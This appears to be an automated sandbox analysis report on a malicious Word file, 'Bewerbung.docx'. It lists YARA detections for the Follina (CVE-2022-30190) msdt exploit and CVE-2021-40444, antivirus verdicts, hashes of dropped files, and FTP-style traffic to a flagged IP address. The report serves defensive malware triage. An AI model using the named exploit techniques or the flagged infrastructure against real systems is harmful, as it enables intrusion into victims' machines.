Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18

Source: Bewerbung.docx	ReversingLabs: Detection: 20%
Source: Bewerbung.docx	Virustotal: Detection: 9%

Source: Bewerbung.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Bewerbung.docx

Source: Bewerbung.docx

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$werbung.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.expl.evad.winDOCX@1/17@0/1

Source: Bewerbung.docx	OLE document summary: title field not present or empty
Source: Bewerbung.docx	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Bewerbung.docx

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.27.134.11	unknown	United Kingdom		34119	WILDCARD-ASWildcardUKLimitedGB	true

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD	data	2D73449B8D78DAFA350E2652E58AF474	6E3C44B9DA465478D5F6F07145482724E39A41A6	7F0DC5AE0300037B2B3E97E869C9EA73500D73A3C810A9B022143E04F580BB5C
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{612F5DAA-547D-4B9D-9911-6A0F512850D5}.FSD	data	5D36EB1ABCA971358AC104A295292725	8ED156E62B7C2EF65A0A1252D39E08C49FA48141	92F5408A7D38930462F4A66DA8C31684D0C2264426AE7D06647A8CA495E307AD
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF	data	904561837AE59053F954C3C7828A2A63	0035CEB2E2449BF184BB89A46386CC0CD0201836	57D90584E6B6FCB107D3BCF20DBD70773A700FC727A18B29C2701235D7F256E4
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD	data	AC6D9560CA10163B754804E863E1E5E5	72C08B794D79345CE8E17FA8D5005CF1A67F585E	B34F7673B5C3F4BED3C0CC8A566207A84C910FDEADC5AC85A32BF9AEC8761580
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{9A8DA008-E48F-49FD-87DE-FE796514F8C9}.FSD	data	64B95E0F62B9F6BB131176B2CF71E0AF	BD9F5A43DDC9F468A3C538AFED622EA1299F5C8E	E9E42D6B3C84C359B965E508E4F11B78812F5F3306A719811A2CC78C91BE41A1
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF	data	1C0214F722586BE1CFFAF7B15F2BC0FD	493EDB15BDFE8EBE97DB3F14A4E37EC1B5478509	6510BEDC2A940AD220C76F4E7D5906003C1B257B5CA24AF4245519EFB7C5689F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html	HTML document, ASCII text, with very long lines	119DBEA31494051D0D82FE7B2DBF8F93	E165513F48E0A94BD49D880421A3BFBD07B59ACA	B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\smartscreen[1].html	HTML document, ASCII text, with very long lines	119DBEA31494051D0D82FE7B2DBF8F93	E165513F48E0A94BD49D880421A3BFBD07B59ACA	B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html	HTML document, ASCII text, with very long lines	119DBEA31494051D0D82FE7B2DBF8F93	E165513F48E0A94BD49D880421A3BFBD07B59ACA	B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html	HTML document, ASCII text, with very long lines	119DBEA31494051D0D82FE7B2DBF8F93	E165513F48E0A94BD49D880421A3BFBD07B59ACA	B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C8D0A30D.png	PNG image data, 472 x 598, 8-bit/color RGB, non-interlaced	2D63CD1ECDCFF4BDAFBC58CC864A3E4A	7262B35EF8E8E20BEB4D6F65D70E9672F2A5587A	9582FFB5FAB18CE903464EABEC820C51A3C24672C2A67C4200381164CE554BE8
C:\Users\user\AppData\Local\Temp\{43393D89-300E-47CC-8994-D4E2F12CC792}	data	C65E6C43949F0E1291B495961A463852	47A81BF112B13637D69A63B6A5B05AED2C67309C	D93BC2C88406DC8A533D53E6B8EDC6AFF8D7DF3EC627502052D0632E53F004EE
C:\Users\user\AppData\Local\Temp\{CAD22245-5381-4AD5-98E9-AA9D7A403AD1}	data	BB8B5FEA0EBA4355ED3209292FB5B6D5	57FABD411996035F633D3147BCE5C5352319F4E1	F4A3AB9B358EE2BE85A8AD1FEB4B356068A700F691213E155AC98BD4CC023471
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bewerbung.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Mon Sep 19 21:34:14 2022, length=105652, window=hide	BAFA09C6DD712A4DF8D35FB2B70D22AF	EA88399956CF7DDB6B803381DC49B8CEA3FE90B2	01C711A49EF9F3FFA16899B929D046996E9EE56BF34303E5106EC41448123EA1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	24A53B806CB95D3F9F02BA065B7E5246	F5B36A4155A9702352ABD00999CA64A144EC7ED2	77E29811AB165B4128F3DBE3774EE26C230570A0BBE2DD8EF334FAC1931F3CE4
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
C:\Users\user\Desktop\~$werbung.docx	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Bewerbung.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: Bewerbung.docx	ReversingLabs: Detection: 20%
Source: Bewerbung.docx	Virustotal: Detection: 9%			Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
